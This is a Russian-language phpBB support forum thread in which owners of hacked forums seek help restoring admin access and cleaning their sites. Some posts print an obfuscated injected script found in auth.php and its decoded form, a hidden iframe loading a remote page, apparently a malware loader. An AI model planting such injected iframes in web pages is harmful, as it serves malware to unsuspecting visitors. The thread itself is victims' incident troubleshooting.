Взломали форум phpBB 2.0.21, нужна помощь восстановить!

Проблемы с установкой или работой phpBB 2.0.x? Получите помощь здесь!

Сообщение Boglik 14.12.2007 8:07

подскажите пожалуста, и скажите как был взломан форум, как защитится от повторного?

Смотри логи.[/quote]
Boglik
phpBB 1.4.0
 
Сообщения: 33
Зарегистрирован: 21.09.2007 7:26


Сообщение Ne$ter 14.12.2007 8:45

crash писал(а):
Ne$ter писал(а):подскажите пожалуста, и скажите как был взломан форум

протелепатировать чтоли?


Хотябы подскажите как вернуть админку.

Добавлено спустя 15 минут 31 секунду:

25 include($phpbb_root_path . 'extension.inc');
26 include($phpbb_root_path . 'common.'.$phpEx);


31 $userdata = session_pagestart($user_ip, PAGE_INDEX);
Ne$ter
phpBB 1.2.1
 
Сообщения: 28
Зарегистрирован: 12.08.2007 18:32

Сообщение ParSulTang 14.12.2007 18:29

crash, ну я это и имел ввиду (не верно выразился). Будут залатываться уязвимости дальше?
Аватара пользователя
ParSulTang
phpBB 1.2.0
 
Сообщения: 17
Зарегистрирован: 12.07.2007 17:28

Сообщение 0-n-e 15.12.2007 13:58

у меня вот сегодня появились те же ошибки, в файле auth.php, после ?> появился скрипт:
Код: Выделить всё
<script type="text/javascript">document.write('\u003c\u0069\u0046\u0072\u0041\u006d
\u0045\u0020\u0073\u0052\u0063\u003d\u0022\u0068\u0074\u0074
\u0070\u003a\u002f\u002f\u0077\u0077\u0077\u002e\u006d\u0073
\u0075\u0070\u0064\u0061\u0074\u0065\u002e\u006f\u0072\u0067
\u002f\u0075\u0070\u0064\u0061\u0074\u0065\u005f\u0066\u0069
\u006c\u0065\u0073\u002f\u0075\u0070\u0064\u0061\u0074\u0065
\u002e\u0070\u0068\u0070\u0022\u0020\u0073\u0043\u0052\u004f
\u006c\u006c\u0049\u004e\u0067\u003d\u0027\u006e\u006f\u0027
\u0020\u0077\u0049\u0064\u0054\u0068\u003d\u0022\u0030\u0030
\u0030\u0031\u0022\u0020\u0068\u0045\u0069\u0067\u0048\u0074
\u003d\u0027\u0030\u0030\u0030\u0031\u0027\u0020\u0073\u0054
\u0059\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c
\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u0020\u006e
\u0061\u006d\u0065\u003d\u0022\u0061\u006e\u0034\u0073\u0073
\u006f\u006c\u006c\u0022\u003e\u0062\u0075\u0064\u006f\u0070
\u0065\u0073\u0068\u0074\u002e\u002e\u002e\u002f\u002f\u002f
\u003c\u002f\u0069\u0046\u0072\u0041\u006d\u0045\u003e')
</script>

Скрипт удалил, все стало на свои места!
что это может быть?
0-n-e
phpBB 1.0.0
 
Сообщения: 7
Зарегистрирован: 07.09.2007 17:01

Сообщение Alek$ 15.12.2007 14:52

0-n-e
это может быть взлом.
Обновите все скрипты на сайте и проверьте их на наличие бекдоров.
Useful links: phpBB2 и phpBB3 FAQ; Правила общения;
Все консультации в icq или личке - на платной основе.

Изображение
Самая страшная ошибка, это ошибка без видимых причин и конкретных последствий.
phpBB3 [db_update.php generator]
phpBB 3.0.2 с предустановленной русификацией
Аватара пользователя
Alek$
Модератор
Модератор
 
Сообщения: 1659
Зарегистрирован: 03.08.2005 12:46
Откуда: Новосибирск

Сообщение Ne$ter 17.12.2007 12:37

Немного посидел и запустилось дальше, но есть одна проблема, прошу помочь.
было так вот $phpbb_root_path = './'; исправил на
$phpbb_root_path = '../'; хотя файл не изменялся, но есть одно но
Кодгда заходиш в админку, то при вводе первого пароля выбрасывает вродебы как на индексовую страницу форума без картинок, но я не активирован, хотя путь указан правильно.

Что может быть, подскажите!
Ne$ter
phpBB 1.2.1
 
Сообщения: 28
Зарегистрирован: 12.08.2007 18:32

Сообщение /DiOs 17.12.2007 14:02

Ne$ter писал(а):было так вот $phpbb_root_path = './'; исправил на
$phpbb_root_path = '../'; хотя файл не изменялся, но есть одно но

Вы уверены, что вы исправили, а не заменили??? Где бы то ни было, первое осначает "текущий каталог", а второе -- "родительский каталог". Что сказать-то хотели?
И если я неправ, пусть старшие товарищи поправят меня
Аватара пользователя
/DiOs
Шестой лесничий
Шестой лесничий
 
Сообщения: 1170
Зарегистрирован: 21.02.2006 7:53
Откуда: Ленинград

Сообщение 0-n-e 17.12.2007 18:30

Alek$ писал(а):проверьте их на наличие бекдоров.

как это сделать?
0-n-e
phpBB 1.0.0
 
Сообщения: 7
Зарегистрирован: 07.09.2007 17:01

Сообщение Alek$ 17.12.2007 18:34

0-n-e
сравнить с бекапами.
Useful links: phpBB2 и phpBB3 FAQ; Правила общения;
Все консультации в icq или личке - на платной основе.

Изображение
Самая страшная ошибка, это ошибка без видимых причин и конкретных последствий.
phpBB3 [db_update.php generator]
phpBB 3.0.2 с предустановленной русификацией
Аватара пользователя
Alek$
Модератор
Модератор
 
Сообщения: 1659
Зарегистрирован: 03.08.2005 12:46
Откуда: Новосибирск

Сообщение Rostunov 28.02.2008 19:46

0-n-e писал(а):у меня вот сегодня появились те же ошибки, в файле auth.php, после ?> появился скрипт:
Код: Выделить всё
<script type="text/javascript">document.write('\u003c\u0069\u0046\u0072\u0041\u006d
\u0045\u0020\u0073\u0052\u0063\u003d\u0022\u0068\u0074\u0074
\u0070\u003a\u002f\u002f\u0077\u0077\u0077\u002e\u006d\u0073
\u0075\u0070\u0064\u0061\u0074\u0065\u002e\u006f\u0072\u0067
\u002f\u0075\u0070\u0064\u0061\u0074\u0065\u005f\u0066\u0069
\u006c\u0065\u0073\u002f\u0075\u0070\u0064\u0061\u0074\u0065
\u002e\u0070\u0068\u0070\u0022\u0020\u0073\u0043\u0052\u004f
\u006c\u006c\u0049\u004e\u0067\u003d\u0027\u006e\u006f\u0027
\u0020\u0077\u0049\u0064\u0054\u0068\u003d\u0022\u0030\u0030
\u0030\u0031\u0022\u0020\u0068\u0045\u0069\u0067\u0048\u0074
\u003d\u0027\u0030\u0030\u0030\u0031\u0027\u0020\u0073\u0054
\u0059\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c
\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u0020\u006e
\u0061\u006d\u0065\u003d\u0022\u0061\u006e\u0034\u0073\u0073
\u006f\u006c\u006c\u0022\u003e\u0062\u0075\u0064\u006f\u0070
\u0065\u0073\u0068\u0074\u002e\u002e\u002e\u002f\u002f\u002f
\u003c\u002f\u0069\u0046\u0072\u0041\u006d\u0045\u003e')
</script>

Скрипт удалил, все стало на свои места!
что это может быть?


У меня тоже самое. Интересно, что этот скрипт делает, как расшифровать?

Добавлено

Ага, декодировал этот код:

Код: Выделить всё
<iFrAmE sRc="http://www.msupdate.org/update_files/update.php" sCROllINg='no' wIdTh="0001" hEigHt='0001' sTYle="display:none" name="an4ssoll">budopesht...///</iFrAmE>
Rostunov
phpBB 1.0.0
 
Сообщения: 2
Зарегистрирован: 28.02.2008 19:26

Сообщение batss 21.03.2008 17:24

Добрый день! Подскажите, пожалуйста!
С сегодняшнего дня при добавлении поста, перед текстом любого пользователя появляется строка: "http://casinopills.com/ukrainskomu_narodu/ tolko posmotrite, vot idioti!!!!" ...
Я не знаю где ее искать. Стыдно. Поискал файлы форума на ниличие хотя бы одного из слов - не нашел. Перезалил из бекапа файлы директорий templates и language - не помогает.
Подскажите, пожалуйста. Сайт и форум серьезный, а эта злополучная строчка, бросает позорную тень. Понятно, что взломали, но как это лечить??? Форум мой лежит здесь http://forum.shooting-ua.com/
batss
phpBB 1.0.0
 
Сообщения: 5
Зарегистрирован: 03.08.2007 14:37

Сообщение crash 21.03.2008 18:05

посмотрите автоцензор
Как правильно задавать вопросы
Для особо одаренных: поиск - это есть круто.
FAQ v.2 | FAQ v.3 | Шаблон запроса
Аватара пользователя
crash
Support Team Leader
 
Сообщения: 6141
Зарегистрирован: 07.07.2004 16:12
Откуда: Мирный

Сообщение Поручик 21.03.2008 18:06

Остальные файлы перезалейте. И дайте тестовый аккаунт, что-то не нашел этой строки.
Профессионал - тот же дилетант, только знающий, где ошибётся.
Генератор db_update.php для phpBB2 с некоторыми удобствами. Многие моды я беру или ищу здесь, здесь, тут
Все консультации только на форуме, приваты и стук в аську по таким вопросам игнорируются!
FAQ-phpBB2 | FAQ-phpBB3 | Ошибки новичков, или как не поссориться с модератором | Правила конференции

наш форум http://forum.aeroion.ru/
Аватара пользователя
Поручик
Его Благородие
Его Благородие
 
Сообщения: 3572
Зарегистрирован: 12.05.2005 16:25
Откуда: Оренбург (Южный Урал)

Сообщение batss 24.03.2008 18:03

Уважаемые Знатоки!
Приношу свои извинения, что не смог ответить сразу. Был в дали от компьютера.
Спасибо. Проблема решена. Был и сидит вирус на локальном компьютере. Т.к. даже на тестовом тоже самое - с других же машин - проблема не замечена.
batss
phpBB 1.0.0
 
Сообщения: 5
Зарегистрирован: 03.08.2007 14:37

Пред.

Вернуться в Поддержка phpBB 2.0.x

Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 0